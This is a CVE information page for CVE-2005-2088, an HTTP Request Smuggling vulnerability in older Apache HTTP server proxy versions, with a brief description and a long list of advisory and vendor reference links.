CVE-2005-2088 Information
Share on:Description
The Apache HTTP server before 1.3.34 and 2.0.x before 2.0.55 when acting as an HTTP proxy allows remote attackers to poison the web cache bypass web application firewall protection and conduct XSS attacks via an HTTP request with both a \Transfer-Encoding: chunked\ header and a Content-Length header which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request aka \HTTP Request Smuggling.\
Reference
http://docs.info.apple.com/article.html?artnum=302847 http://lists.trustix.org/pipermail/tsl-announce/2005-October/000354.html http://marc.info/?l=apache-httpd-announce&m=112931556417329&w=3 http://seclists.org/lists/bugtraq/2005/Jun/0025.html http://secunia.com/advisories/14530 http://secunia.com/advisories/17319 http://secunia.com/advisories/17487 http://secunia.com/advisories/17813 http://secunia.com/advisories/19072 http://secunia.com/advisories/19073 http://secunia.com/advisories/19185 http://secunia.com/advisories/19317 http://secunia.com/advisories/23074 http://securityreason.com/securityalert/604 http://securitytracker.com/id?1014323 http://slackware.com/security/viewer.php?l=slackware-security&y=2005&m=slackware-security.600000 http://sunsolve.sun.com/search/document.do?assetkey=1-26-102197-1 http://sunsolve.sun.com/search/document.do?assetkey=1-26-102198-1 http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm http://www.apache.org/dist/httpd/CHANGES_1.3 http://www.apache.org/dist/httpd/CHANGES_2.0 http://www.debian.org/security/2005/dsa-803 http://www.debian.org/security/2005/dsa-805 http://www.mandriva.com/security/advisories?name=MDKSA-2005:130 http://www.novell.com/linux/security/advisories/2005_18_sr.html http://www.novell.com/linux/security/advisories/2005_46_apache.html http://www.redhat.com/support/errata/RHSA-2005-582.html http://www.securiteam.com/securityreviews/5GP0220G0U.html http://www.securityfocus.com/archive/1/428138/100/0/threaded http://www.securityfocus.com/bid/14106 http://www.securityfocus.com/bid/15647 http://www.ubuntu.com/usn/usn-160-2 http://www.vupen.com/english/advisories/2005/2140 http://www.vupen.com/english/advisories/2005/2659 http://www.vupen.com/english/advisories/2006/0789 http://www.vupen.com/english/advisories/2006/1018 http://www.vupen.com/english/advisories/2006/4680 http://www.watchfire.com/resources/HTTP-Request-Smuggling.pdf http://www-1.ibm.com/support/search.wss?rs=0&q=PK13959&apar=only http://www-1.ibm.com/support/search.wss?rs=0&q=PK16139&apar=only http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00612828 https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac@3Ccvs.httpd.apache.org3E https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79@3Ccvs.httpd.apache.org3E https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc@3Ccvs.httpd.apache.org3E https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb@3Ccvs.httpd.apache.org3E https://oval.cisecurity.org/repository/search/definition/oval3Aorg.mitre.oval3Adef3A11452 https://oval.cisecurity.org/repository/search/definition/oval3Aorg.mitre.oval3Adef3A1237 https://oval.cisecurity.org/repository/search/definition/oval3Aorg.mitre.oval3Adef3A1526 https://oval.cisecurity.org/repository/search/definition/oval3Aorg.mitre.oval3Adef3A1629 https://oval.cisecurity.org/repository/search/definition/oval3Aorg.mitre.oval3Adef3A840 https://secure-support.novell.com/KanisaPlatform/Publishing/741/3222109_f.SAL_Public.html